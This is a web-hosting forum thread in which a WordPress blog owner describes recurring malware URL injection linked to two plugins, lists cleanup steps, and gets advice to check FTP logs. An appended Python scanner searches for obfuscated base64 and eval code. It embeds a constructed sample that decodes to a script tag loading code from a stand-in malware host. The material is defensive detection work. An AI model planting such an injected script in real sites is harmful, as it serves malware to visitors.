
Security issue, I'd love to hear your thoughts ? PLEASE :) (4 posts)

  1. Sabinou
    Member
    Posted 2 years ago

    Hello, for almost half a year I have had a recurring security problem, and I really don't understand where it may be coming from.

    Could I ask for your opinion, please?

    Since I'm trying to give all the details, I'm sorry that this is a wall of text, but I'll be VERY grateful if you can bear with it, and tell me if you have an idea about how my security has been breached repeatedly :)

    In short, my visitors sometimes report that every page of my blog is trying to inject a malware-ish URL into them.

    - Once, around half a year ago, I had my footer edited with a call for a malware URL.

    -> I cleaned my template from all junk, reinstalled a clean copy of my blog template (one of Andreas Viklund's templates, it should be trustworthy), and changed every single password related to my account, FTP, email, phpmyadmin, hosting, etc.
    I also CHMODed my template's files so that nobody can edit them, the admin/owner included.

    - More attacks followed, and the following times, the URL wasn't present in the source code of my website when I loaded it. My visitors and I had it loaded (briefly appearing in the "loading" part of the browser's status bar, and also noticed among the loaded and blockable elements by the AdblockPlus plugin).

    - The first two times, it appeared that deactivating LesterChan's wp-postratings plugin stopped the URL injection. I also noted that saving my blog's public HTML output source code to my disk, into an HTML file, and cropping everything but wp-postratings' call, was enough to trigger a virus alert warning when I opened the resulting HTML file in a browser.

    - The 4 following times, it was LesterChan's wp-polls plugin that had to be deactivated to stop the injection.

    - Every time with LesterChan's plugins, I deactivated the plugin, deleted it by FTP, and reuploaded a fresh copy grabbed from wordpress.org, and when I reactivated it, the malware injection didn't come back.

    - However, using a file comparison utility (Beyond Compare), I found that my "compromised" versions of LesterChan's plugins and the originals as served by wordpress.org or by Lesterchan.net were, bit for bit, character by character (binary and text comparison): strictly identical.

    - I'll insist again, I have changed ALL my passwords even remotely related to my website. FTP accounts, admin, users, main hosting account, database, phpmyadmin, email accounts.
    Even if one password had been compromised once, no dictionary attack, personal knowledge of who I am or pattern guessing could have allowed anyone to know my passwords another time.

    - LesterChan himself, when asked if he had an idea, simply suggested reuploading a fresh copy of the plugin, and had no other insight.

    - Speaking of LesterChan, he also had a possible security breach; it may have allowed someone to take a first step into my blog: http://lesterchan.net/wordpress/2011/02/17/code-injection-follow-up/
    - But since then, his plugins have been cleaned of this.

    - I searched my whole blog and my blog's database for occurrences of base64 encoding, of reversed (right to left) base64 encoding, and of rot13-converted base64 encoding, and found nothing.
    - I also deleted all of (root)/wp-admin, root/wp-includes and root/wp-content/, and reinstalled the plugins and the blog template.
    The attack still came back another time.

    -> I'm on shared hosting; however, my web host (OVH) is rather professional at doing its job, and I doubt they'd have left open the risk of being compromised by other websites on the same cluster.

    -> The Exploit Scanner plugin is also useless: for reasons unknown to mankind, it's unable to scan files larger than 10 or 15 KB in size. At least at that size, it doesn't notice illegitimate stuff.

    -> Regrettably, my web logs are useless. There's more than 1 GB of text every day, and my text editors die before they manage to open the files.

    -> Could it be that some form of backdoor may have been left behind, in order to be able to use a plugin's legitimate code to inject nasty stuff?

    ...
    And there I am, clueless.

    Please, would you have an idea, an opinion, a thought about it?

    Thank you VERY MUCH if you can help me! :)

  2. Samuel B
    moderator
    Posted 2 years ago

  3. MickeyRoush
    Member
    Posted 2 years ago

    Have you excluded the possibility that someone has obtained your FTP credentials? Your server should have FTP logs. Review them for anything out of the ordinary. If you don't have access to them, ask your host.

  4. Sabinou
    Member
    Posted 2 years ago

    Thank you, you two :)

    - There was no IP other than mine connecting by FTP in the last 15 days.

    - I've read the Ottopress post some time ago, it's thanks to him that I thought of scanning the database for all kinds of lines and obfuscation attempts revolving around base64 encoding.

    - I also searched the text contents of all my blog files (core + plugins + theme) in search of invalid eval or base64 references, but I found nothing.
    My wp-config file refers to nothing out of the norm.

    I'm lost, I regret to say, but thanks for the two replies!
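A scanner for the searches described in the first and last posts (plain, reversed and rot13'd base64 literals, plus eval of a decoder), as an added example that is not code from the thread, from WordPress or from the plugins mentioned; the pattern list, the install root path and the sample file are constructed assumptions.

```python
import base64
import codecs
import os
import re
# Constructs injected PHP hides behind: a constructed, non-exhaustive list (legitimate code also uses some, so review hits).
PATTERNS = {
    "eval_of_decoder": re.compile(r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|strrev|base64_decode)\s*\(", re.I),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "reverse_or_rot13": re.compile(r"\b(?:strrev|str_rot13)\s*\(", re.I),
    "long_base64_literal": re.compile(r"['\"](={0,2}[A-Za-z0-9+/]{80,}={0,2})['\"]"),
}
CODE_LIKE = re.compile(r"<\?php|\beval\s*\(|\bsystem\s*\(|<script|https?://", re.I)

def peel(blob):
    """Try the three decodings the poster searched for (plain, reversed and rot13'd
    base64); return the first result that looks like code or markup, else None."""
    for cand in (blob, blob[::-1], codecs.decode(blob, "rot_13")):
        try:
            text = base64.b64decode(cand, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64 in this orientation
            continue
        if CODE_LIKE.search(text):
            return text
    return None

def scan_text(text):
    """Return (pattern_name, line_number, evidence) for each suspicious hit in one file."""
    hits = []
    for name, rx in PATTERNS.items():
        for m in rx.finditer(text):
            evidence = peel(m.group(1)) if name == "long_base64_literal" else m.group(0)
            if evidence is None:  # long literal decoding to nothing code-like, e.g. an inline image
                continue
            hits.append((name, text.count("\n", 0, m.start()) + 1, evidence[:60]))
    return hits

def scan_tree(root, exts=(".php", ".html", ".js")):
    """Walk a WordPress install at `root` (an assumed path); yield (path, hits) per flagged file."""
    for dirpath, _, files in os.walk(root):
        for fn in (f for f in files if f.endswith(exts)):
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                yield path, hits

# Constructed sample of an injected file: reversed base64 that unwraps to a script tag.
PAYLOAD = base64.b64encode(b"<?php echo '<script src=\"http://malware.invalid/x.js\"></script>'; ?>").decode()
SAMPLE = "<?php\n$a = strrev('" + PAYLOAD[::-1] + "');\neval(base64_decode($a));\n"
```

Run it as `for path, hits in scan_tree("/path/to/wordpress"): print(path, hits)` against a copy of the install; the same `scan_text` can be applied to dumped database rows, which the thread also searched.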
